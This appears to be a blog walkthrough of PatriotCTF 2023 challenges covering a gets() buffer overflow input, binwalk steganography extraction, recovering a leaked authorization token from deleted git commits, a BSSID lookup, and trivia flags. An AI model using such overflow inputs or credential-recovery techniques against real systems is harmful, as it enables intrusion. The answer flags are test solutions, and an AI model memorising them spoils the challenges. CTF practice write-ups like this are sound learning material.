PatriotCTF 2023: Step-by-Step Walkthrough

ยท

6 min read

๐Ÿ”“ Pwn

1. Guessing game

"No one seems to be able to guess my favorite animal... Can you?"

Connecting to provided socket, we are prompted with a message that asks:
Hello there, friend! Can you guess my favorite animal?

Typing in a random animal like Tiger, we get the reply:
That's not my favorite animal... I promise!

My first step was to check for strings in the proviede binary, we see the Name "Giraffe", but doesnt work. I didn't see anything useful, so i moved on with Ghidra.

Ghidra functions:

  • Main()

  • check()

  • outputFlag()

main():



undefined8 main(void)

{
  puts("Hello there, friend! Can you guess my favorite animal?");
  check();
  return 0;
}

check():

void check(void) {
  int iVar1;
  undefined8 local_140;
  char local_138 [300];
  int local_c;


  local_140 = 0x65666661726947;
  local_c = 0;
  printf("Input guess: ");
  gets(local_138);
  iVar1 = strcmp(local_138,(char *)&local_140);
  if (iVar1 == 0) {
    puts("That\'s not my favorite animal... I promise!");
  }
  else {
    puts("ERRR! Wrong!");
  }
  if (local_c != 0) {
    puts("I wasn\'t able to trick you...");
    outputFlag();
  }
  return;
}

OutputFlag()

void outputFlag(void)

{
  char local_38 [40];
  FILE *local_10;

  local_10 = fopen("flag.txt","r");
  if (local_10 == (FILE *)0x0) {
    printf("Unable to find flag.txt :(");
  }
  else {
    fgets(local_38,0x23,local_10);
    printf("%s",local_38);
  }
  fclose(local_10);
  return;
}

From this code we can clearly see the Usage of gets() in check().
The variable local_138 of buffer 300 is being passed onto gets().

As a PWN noob, my first intusion was to try to overflow the buffer, so i did:
print('A'*301)

And we got the flag!

๐Ÿ” Forensics

2. Capybara

What a cute picture of a capybara!

Since it was a forensic chal, i went ahead and checked the exifdata, but found nothing useful. Tried cracking stego pass, but failed.

And tried to look for hidden files using binwalk and we get:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
151174        0x24E86         Zip archive data, at least v2.0 to extract, compressed size: 6902, uncompressed size: 919160, name: audio.wav
158170        0x269DA         End of Zip archive, footer length: 22

So i extract it with:
binwalk -e capybara.jpeg

And we get a audio.wav file which was just a long audio of morse code.
Decoded it with a Online voice to text morse decoder.

And got the Hexadecimal Output which on decode got the flag:
PCTF{d0_y0U_kN0W_h0W_t0_R34D_m0r53_C0d3?}

๐ŸŒ Web

3. Scavenger Hunt

Can you find all the hidden pieces of the flag?

(1/5) PCTF{Hunt - Given on index.html
(2/5) 3r5_4n - source code of index.html
(3/5) D_g4tH3 - robots.txt
(4/5) R5_e49 - js code
(5/5) e4a541} - cookies

Flag: PCTF{Hunt3r5_4nD_g4tH3r3R5_e49e4a541}

๐Ÿ”— OSINT

4. Bad Documentation

"I heard that this security researcher accidentally leaked his password in his documentation, but he deleted all the files in his repository so now we don't have access to it anymore! I'm pretty sure it's hopeless, but if you think you can find it here's the link to the repo: github.com/Th3Burn1nat0r/vuln."

I cloned the repo and check for leaks in all the commit, one commit message stood out:

commit 52552b52ac8ad993d150ff83a8e12bfeee6e74e6
Author: Th3Burn1nat0r <128736125+Th3Burn1nat0r@users.noreply.github.com>
Date:   Thu Mar 23 13:56:43 2023 -0400

    Add files via upload

I reverted to that commit using the commands:

git reset 52552b52ac8ad993d150ff83a8e12bfeee6e74e6

The above command reverts back to place before commiting those files, which means the files must be staged right now.

git status:

Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
    deleted:    J-Link/JLE24007
    deleted:    J-Link/JLE25006
    deleted:    J-Link/JLE25006.png

Now restore all the staged files using the command:
git restore *

we find a PNG Image J-Link/JLE25006.png, which looks like a burp screenshot

Although we might not notice at first, we can see the authorization token as header in request, Read it using a OCR reader and Decode the base64 to get the flag.

5. Rogue Access Point

We've received a notice from our companies EDR software that a laptop was attacked while they were on WFH. The employee says they were at home when it happened, but we suspect they were using public wifi. Our EDR software managed to capture the BSSID of the wifi (46:D1:FA:63:BC:66) network before it got disconnected, but not the SSID. Can you still find the network they were connected to?

When it comes to SSID/BSSID and stuff, i use wigle.net.
Which is a Map of SSID around the world, and it has a feature to search by BSSID

We have BSSID: 46:D1:FA:63:BC:66

I put in the BSSID and pressed filter, which pointed to a place near Washington, US,
Now to get more information about the Tracked SSID, you need to Login.

Zooming in, we find the BSSID belongs to Red table's free wifi. which is also the SSID.

Flag: PCTF{Red's Table Free Wifi}

๐Ÿ’ก MISC

6. Uh Oh!

Uh Oh! While trying to add passwords to my wordlist, I accidentally added my own phone number! Can you tell me what line it's on?
For example (123) 456-7890

Flag format: PCTF{linenumber_phonenumonlynumbers}

We are provided with the Rockyou file, but this might contain the phone number somewhere. We can utilize the power of REGEX to solve this.

REGEX i used:
cat -n rockyou.txt | grep -P '\(\d{3}\) \d{3}-\d{4}'

where,
-n = cat with line numbers
-P = use PERL compaitable regex
\d - matches digits
{n} - matches n number of repetitions (fixed)

โ””โ”€โ”€โ•ผ $cat -n rockyou.txt | grep -P '\(\d{3}\) \d{3}-\d{4}'
7731484    (404) 303-7283

FLAG: PCTF{7731484_4043037283}

๐Ÿค“ Trivia

7. 1972 Schism

Before George Mason University became its own college, GMU was a satellite school of what other commonwealth college?

A simple google search says "University of Virgia", whose abbreviation is 'UVA'

FLAG: PCTF{UVA}

8. Mascot Conundrum

After GMU's brief foray into the Final Four, administration decided to change the school mascot to the modern day hat wearing, green and gold donned Patriot we know and love. However, before this GMU had several different mascots, one of which was particularly loved by students and facualty alike. What was the name of the masoct that preceded The Patriot?

A google search leads to the Webpage:
https://www.gmu.edu/news/2022-03/archives-history-mason-mascots

Which leads to a youtube video of top 6 mascots in GMU history, If you watch the video you can find that its the Gunston that preceded the current mascot.

FLAG: PCTF{Gunston}

9. Mason ID OSINT

Since 2010, all student ID's at GMU have featured a photo of one of the prominent buildings on campus. Can you figure out the individual for which the building featured on the Mason ID is named after? Your answer should be in the format PCTF{FirstName, LastName}

This one honestly took some searching for me. In a quick search we find the building is called Johnson Center located in Firefax campus. But who is Johnson though?

I reached out to ChatGPT who came up with a name 'Lywood Johnson', who probably never existed.

After some searching, found a link in GMU's website: https://www.gmu.edu/news/2022-07/retro-mason-johnson-center-dedication-1996

Flag: PCTF{George, Johnson}

Takeaway

As a self-proclaimed Jeopardy CTF noob, it was not satisfying that I couldn't solve more web and crypto challenges. But I guess I'm fine with the OSINTs. Now it's time to practice some PWN and CRYPTO before moving on to the next CTFs.

ย